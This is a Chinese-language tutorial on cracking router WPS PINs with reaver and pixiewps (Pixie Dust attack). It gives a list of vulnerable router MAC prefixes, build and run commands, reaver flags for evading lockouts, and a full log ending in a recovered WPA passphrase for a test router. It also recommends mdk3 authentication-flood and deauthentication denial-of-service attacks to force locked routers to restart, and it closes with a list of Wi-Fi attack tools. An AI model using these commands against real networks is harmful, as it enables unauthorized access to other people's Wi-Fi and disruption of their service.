背景

就在距离2012还有几天的2011年底，安全研究员Stefan Viehbock在其博客上公布了WPS存在着安全漏洞，而且涉及了多家厂商的大量的无线设备。由于该漏洞的细节已经公开。换句话说，黑客们也已经知道了这个安全漏洞，并将毫无疑问地利用该漏洞进行攻击。因此美国计算机应急准备小组(US-CERT)警告说，数以百万计的家庭无线路由器将有可能面临被黑客破解网络密码[3]。

在此消息发布后，Tactical Network Solutions（TNS）安全公司表示早在一年之前，他们就已经发现了该漏洞，但出于漏洞涉及面广的考量并未公布。但现在出于宣传目的，TNS放出了免费版的PIN码破解工具（即为reaver）[3]。

4年后的今天，reaver似乎已经由Kali社区的t6x接手，在最新的1.5.2版本中使用 -K 1 参数整合了pixiewps，极大加快枚举PIN的速度。

测试环境

系统 Ubuntu Kylin 14.04 32bit
网卡 TP-LINK TL-WN722N
路由器 FAST FW150R

Dust Attack 受影响芯片列表

不是都通用，受影响的有老款雷凌芯片的ap、少量博通芯片的ap、atheros芯片的ap不受影响
TP-LINK用atheros芯片的比较多,基本没用

可以破解的的版本有以下几种,更多详细列表参阅[5]

62：6B：D3 EchoLife HG556a vodafoneXXXX
62：53：D4 EchoLife HG556a vodafoneXXXX
62：CB：A8 華為vodafoneXXXX
6A：23：3D 華為vodafoneXXXX
72：23：3D 華為vodafoneXXXX
72：3D：FF 華為vodafoneXXXX
72：55：9C ？ vodafoneXXXX

0C：96：BF 雷凌橙色-XXXX
08：7A：4C 雷凌橙色-XXXX
20：08：ED 華為橙色-XXXX
D0：7A：B5 HG532s橙色-XXXX
E8：CD：2D HG530s橙色-XXXX

00：A0：26 iRouter 1104-W WLAN_XXXX
C8：D3：A3 D-link的MOVISTAR_XXXX
B2：46：FC MOVISTAR_XXXX

5C：35：3B 寬帶ONOXXXX
DC：53：7C 仁寶ONOXXXX

6C：B0：CE 美國網件EX2700

安装 reaver 1.5.2

git clone git@github.com:t6x/reaver-wps-fork-t6x.git ./reaver15
cd reaver15/src
chmod 777 configure
./configure
make
sudo make install
`

安装 pixiewps

git clone git@github.com:wiire/pixiewps.git ./pixiewps
cd pixiewps/src
make
sudo make install

结合 dust attack 的 reaver

需要添加 -K 1 参数

1	sudo reaver -i mon0 -b EC:88:8F:A1:A5:90 -K 1

reaver 命令详解

以一个命令的参数详解[13]来举例解释吧。

1	sudo reaver -i mon0 -b EC:88:8F:A1:A5:90 -vv -N -L -d 60 -r 3:15 -T .5 -x 360 -s EC888FA1A590.wpc

-i 指定 interface

-b 目标的bssid ,即为目标AP的MAC地址

-vv 提供更详细的输出log

-N 不发送NACK信息（如果一直pin不动，可以尝试这个参数）

-L 忽略目标AP报告的锁定状态

-d 60 –delay= Set the delay between pin attempts
pin间延时，默认1秒,设置要看具体路由器的安全功能

-r 3:15 –recurring-delay= Sleep for y seconds every x pin attempts
每x次pin后等待y秒，例子是每3次pin等待15秒

-T .5 -T, –m57-timeout= Set the M5/M7 timeout period [0.20] M5/M7超时，默认0.2秒

-x 360 -x, –fail-wait= Set the time to sleep after 10 unexpected failures 10次意外失败后等待时间，默认0秒

-s EC888FA1A590.wpc -s, –session= Restore a previous session file
从文件恢复暴力搜索进度

一段成功的 log ，花费了大概 3～4天的时间，每天 pin 几个小时，如果路由器被锁就休息。

这段log 表示后三位由070一直pin到079。PIN 的最后一位是校验和，可以由前七位导出。

[+] 91.63% complete @ 2015-08-14 15:25:30 (67 seconds/pin)
[+] Trying pin 16030701
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 16030718
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030725
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030732
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 16030749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 91.67% complete @ 2015-08-14 15:31:11 (67 seconds/pin)
[+] Trying pin 16030756
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030763
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Entering recurring delay of 15 seconds
[+] Trying pin 16030770
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030787
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 16030794
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] 100.00% complete @ 2015-08-14 15:36:37 (67 seconds/pin)
[+] Pin cracked in 13517 seconds
[+] WPS PIN: '16030794'
[+] WPA PSK: 'robinlyh123!321'
[+] AP SSID: 'crack_me'

可能遇到的问题

WPS transaction failed (code: 0x04)

刚打开 reaver 就一直报出 WPS transaction failed (code: 0x04) 的错误。

解决:libpcap0.8 版本回退

参考[12]

里面提到的两个包 libpcap0.8_1.4.0-2_amd64.deb 与 libpcap0.8-dev_1.4.0-2_amd64.deb 还是非常难找的，不过还好论坛原帖有提供下载。我在其他地方只找到过更高或者更低的版本。

0x02与0x03混合报错

The 0x02 and 0x03 codes are just re-iterating the messages that you are already seeing: receive timeouts and out of order packets respectively. Without seeing the pcap it’s hard to say what the problem might be, but you might try the –no-nacks option which will prevent Reaver from instantly NACKing out of order packets.

长期警告无法Associate

[+] Waiting for beacon from 50:BD:5F:63:48:32
[!] WARNING: Failed to associate with 50:BD:5F:63:48:32 (ESSID: TESTWIFI)

AP 未开启 WPS 功能或不支持 WPS 功能

长期警告 Receive timeout

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from EC:88:8F:A1:A5:90
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Associated with EC:88:8F:A1:A5:90 (ESSID: crack_me)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

一般我的做法是关闭并取下 USB 网卡，过一段时间

WPS transaction failed (code: 0x02)

可能的错误原因[10]

Low Signal Strength
Weak Firewall of Router or Modem
WPS is Locked

Low Signal Strength

If you have low signals i.e above -80dbi or below 20dbi then you must have such type of error because reaver is unable to link its wps pin connection with router.

Weak Firewall of Router or Modem

Reaver 的 pin attempts 过于频繁，导致触发路由器崩溃来不及处理。

解决：使用 -d 来降低试探频率

You can command reaver to wait for few seconds after each pin attempt for this you will use “ -d 3 “ after your command and 3 means to wait for 3 seconds and after inject the another pin.

Example is below

1	reaver -i mon0 -b BSSID -c Channel No -d 3 -w -vv

WPS is locked

可以通过 reaver 自带的嗅探工具 wash 来检测附近的 AP 是否处于被锁状态。

1	wash -i mon0

You can also try my trick which i use to unlock some routers who have locked wps. i usually dos attack on routers which cause the routers to restart themselves.

I Perform this attack using MDK3 and you can also give it a try by typing the below command
验证请求拒绝服务攻击

1	mdk3 mon0 a -a bssid

this will dos the router and cause him to restart himself and when its restarted , wps will be unlocked.

或者进行连接解除攻击，最好设置一下黑名单和白名单。

1	mdk3 mon0 d

补充

不过我对 wash 的测试一直是失败的,没获取到任何信息。
测试过的网卡芯片包括
Intel Centrino Advanced-N 6230 AGN
ATHEROS USB2.0 WLAN
相关的驱动分别为
iwlwifi
ath9k

错误log

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------

其他无线安全审计总结

常用的工具[17]

aircrack-ng aircrack 系列套件
reaver & wash WPS攻击
pixiewps 离线WPS攻击
minidwep-gtk 水滴
beini 奶瓶
mdk3 伪ssid工具
打气筒 经常有提到，但我不知道原名叫什么
wifislax 钓鱼伪AP工具
Wifite 一款自动化wep、wpa攻击工具
oclHashcat GPU加速
Fern Wifi Cracker Fern Wifi Cracker使用了Python语言和PyQt图形界面库，能够攻击WEP/WPA/ WPS的WIFI网络，它还可以进行MITM中间人攻击。
Crunch 字典生成工具
Macchanger 本机MAC修改